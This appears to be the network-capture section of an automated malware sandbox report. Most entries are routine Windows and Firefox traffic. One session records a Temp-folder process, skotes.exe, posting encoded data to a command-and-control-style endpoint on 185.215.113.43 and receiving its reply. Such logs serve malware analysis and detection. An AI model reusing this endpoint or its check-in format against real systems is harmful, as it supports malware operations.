Nov 4, 2024 17:38:19.476182938 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59692 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:38:29.508898020 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:38:38.595093012 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:38:38.719969034 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59711 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 4, 2024 17:38:48.807200909 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:38:58.816519022 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:39:08.908679962 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:39:19.016062975 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:39:29.105483055 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:39:39.320226908 CET	6	OUT	Data Raw: 00 Data Ascii:
Nov 4, 2024 17:39:59.407727003 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 4, 2024 17:39:59.535418034 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 00:03:27 GMT Age: 59792 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	50400	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:37:19.226396084 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:37:20.111172915 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:37:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49713	40.126.32.74	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:12 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-04 16:31:12 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-04 16:31:12 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 04 Nov 2024 16:30:12 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: 8ae0481f-21a3-466b-bf92-0f4e69988801 PPServer: PPV: 30 H: SN1PEPF0002F9FA V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 04 Nov 2024 16:31:11 GMT Connection: close Content-Length: 1918
2024-11-04 16:31:12 UTC	1918	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	49714	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:12 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 6e 68 4e 51 62 2f 66 46 32 6b 79 39 79 31 71 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 39 66 64 31 31 62 62 37 64 35 63 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: nhNQb/fF2ky9y1qE.1Context: a339fd11bb7d5cc
2024-11-04 16:31:12 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:12 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 6e 68 4e 51 62 2f 66 46 32 6b 79 39 79 31 71 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 39 66 64 31 31 62 62 37 64 35 63 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c 72 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: nhNQb/fF2ky9y1qE.2Context: a339fd11bb7d5cc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6Lr
2024-11-04 16:31:12 UTC	73	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 35 0d 0a 4d 53 2d 43 56 3a 20 6e 68 4e 51 62 2f 66 46 32 6b 79 39 79 31 71 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 39 66 64 31 31 62 62 37 64 35 63 63 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 55MS-CV: nhNQb/fF2ky9y1qE.3Context: a339fd11bb7d5cc
2024-11-04 16:31:12 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:12 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 58 53 2b 63 50 33 4a 73 6e 45 4f 6a 31 73 48 4d 45 67 6d 51 52 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: XS+cP3JsnEOj1sHMEgmQRg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49716	40.126.32.74	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:13 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-04 16:31:13 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-04 16:31:14 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 04 Nov 2024 16:30:13 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.5 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C521_SN1 x-ms-request-id: fab894c2-10b1-4ece-935e-0d5df8a82e06 PPServer: PPV: 30 H: SN1PEPF0003FB25 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 04 Nov 2024 16:31:13 GMT Connection: close Content-Length: 11412
2024-11-04 16:31:14 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	49718	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:15 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 5a 31 31 68 62 4b 49 73 45 4b 6e 46 4c 4b 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 32 62 34 62 63 63 39 39 37 37 66 61 34 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: xZ11hbKIsEKnFLKg.1Context: bd2b4bcc9977fa4f
2024-11-04 16:31:15 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:15 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 5a 31 31 68 62 4b 49 73 45 4b 6e 46 4c 4b 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 32 62 34 62 63 63 39 39 37 37 66 61 34 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xZ11hbKIsEKnFLKg.2Context: bd2b4bcc9977fa4f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6L
2024-11-04 16:31:15 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 5a 31 31 68 62 4b 49 73 45 4b 6e 46 4c 4b 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 32 62 34 62 63 63 39 39 37 37 66 61 34 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: xZ11hbKIsEKnFLKg.3Context: bd2b4bcc9977fa4f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-04 16:31:15 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:15 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 72 57 47 39 4a 2b 2b 7a 4e 45 4b 78 6e 67 45 79 44 72 69 59 33 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: rWG9J++zNEKxngEyDriY3Q.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	49719	40.126.32.74	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:15 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-04 16:31:15 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-04 16:31:16 UTC	653	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 04 Nov 2024 16:30:15 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.5 Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C521_SN1 x-ms-request-id: 0680a339-dfda-498c-8339-3b263f3166f8 PPServer: PPV: 30 H: SN1PEPF0002F137 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 04 Nov 2024 16:31:15 GMT Connection: close Content-Length: 11412
2024-11-04 16:31:16 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

